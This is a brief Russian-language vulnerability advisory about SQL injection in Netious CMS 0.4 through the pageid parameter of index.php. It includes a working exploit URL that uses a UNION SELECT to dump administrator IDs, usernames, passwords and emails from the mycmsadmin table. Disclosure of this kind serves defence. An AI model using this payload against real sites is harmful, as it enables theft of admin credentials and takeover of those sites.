Программа: Netious CMS 0.4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием index.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://localhost/netious/index.php?pageid=’/**/union/**/select/**/1,concat_ws(
0x3a3a,AdminId,username,password,adminMail),3 +from+mycmsadmin/*

Оставить мнение